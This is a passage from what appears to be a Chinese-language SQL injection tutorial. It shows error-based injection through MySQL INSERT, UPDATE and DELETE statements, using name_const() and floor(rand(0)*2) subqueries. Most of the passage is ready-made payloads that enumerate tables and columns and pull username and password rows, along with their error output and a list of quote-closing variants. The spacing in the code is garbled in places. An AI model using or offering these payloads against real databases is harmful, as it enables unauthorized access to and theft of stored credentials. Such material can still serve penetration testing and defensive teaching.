在最新的MYSQL版本中，使用name_const()函数只能提取到数据库的版本信息。但是在一些比较旧的高于5.0.12(包括5.0.12)的MYSQL版本中，可以进一步提取更多数据。在这里我使用MySQL5.0.45进行演示。
首先，我们做一个简单的SELECT查询，检查我们是否可以提取数据。INSERTINTO users (id, username, password)&VALUES&(1,'Olivia'or&(SELECT*FROM(SELECT name_const((SELECT2),1),name_const((SELECT2),1))a)&or'',&'Nervo');
如果显示ERROR 1210 (HY000): Incorrect arguments to NAME_CONST，那就洗洗睡吧。。
如果显示ERROR ): Duplicate column name '2'，就可以进一步获取更多数据。
获取newdb数据库表名：INSERTINTO users (id, username, password)&VALUES&(1,'Olivia'or&(SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1),name_const((&SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1))a)&or'',&'Nervo');ERROR ): Duplicate column name 'users'
获取users表的列名：INSERTINTO users (id, username, password)&VALUES&(1,'Olivia'or&(SELECT*FROM(SELECT name_const((SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1),name_const((&SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1))a)&or'',&'Nervo');ERROR ): Duplicate column name 'id'
获取users表的数据：INSERTINTO users (id, username, password)&VALUES&(2,'Olivia'or&(SELECT*FROM(SELECT name_const((SELECT concat_ws(0x7e,id, username, password)&FROM users limit 0,1),1),name_const((&SELECT concat_ws(0x7e,id, username, password)&FROM users limit0,1),1))a)&or'',&'Nervo');ERROR ): Duplicate column name '1~Jane~Eyre'0x06&利用子查询注入
原理与select查询时的显错注入一致。
Insert：INSERTINTO users (id, username, password)&VALUES&(1,'Olivia'or&(SELECT1FROM(SELECTcount(*),concat((SELECT&(SELECT concat(0x7e,0x27,cast(database()&aschar),0x27,0x7e))&FROM information_schema.tables limit 0,1),floor(rand(0)*2))x&FROM information_schema.columns groupby x)a)&or'',&'Nervo');
update：UPDATE users SET password='Nicky'or&(SELECT1FROM(SELECTcount(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database()&aschar),0x27,0x7e))&FROM information_schema.tables limit 0,1),floor(rand(0)*2))x&FROM information_schema.columns groupby x)a)or''WHERE id=2and username='Nervo';
delete：DELETEFROM users WHERE id=1or&(SELECT1FROM(SELECTcount(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database()&aschar),0x27,0x7e))&FROM information_schema.tables limit 0,1),floor(rand(0)*2))x&FROM information_schema.columns groupby x)a)or''&;
提取数据：
获取newdb数据库表名：INSERTINTO users (id, username, password)&VALUES&(1,'Olivia'or&(SELECT1FROM(SELECTcount(*),concat((SELECT&(SELECT&(SELECTdistinct concat(0x7e,0x27,cast(table_name aschar),0x27,0x7e)&FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1))&FROM information_schema.tables limit 0,1),floor(rand(0)*2))x&FROM information_schema.columns groupby x)a)&or'','Nervo');
获取users表的列名：INSERTINTO users (id, username, password)&VALUES&(1,&'Olivia'or&(SELECT1FROM(SELECTcount(*),concat((SELECT&(SELECT&(SELECTdistinct concat(0x7e,0x27,cast(column_name aschar),0x27,0x7e)&FROM information_schema.columns WHERE table_schema=database()&AND table_name='users' LIMIT 0,1))&FROM information_schema.tables limit 0,1),floor(rand(0)*2))x&FROM information_schema.columns groupby x)a)&or'',&'Nervo');
获取users表的数据：INSERTINTO users (id, username, password)&VALUES&(1,&'Olivia'or&(SELECT1FROM(SELECTcount(*),concat((SELECT&(SELECT&(SELECT concat(0x7e,0x27,cast(users.username aschar),0x27,0x7e)&FROM`newdb`.users LIMIT 0,1)&)&FROM information_schema.tables limit 0,1),floor(rand(0)*2))x&FROM information_schema.columns groupby x)a)&or'',&'Nervo');
0x07 更多闭合变种' or (payload)&or''and&(payload)&and''or&(payload)&and''or&(payload)&and'=''*&(payload)&*'' or (payload) and '&&–&(payload)&–&&0x08&引用
http://websec.ca/kb/sql_injection
from：http://www./wp-content/themes/exploit/docs/33253.pdf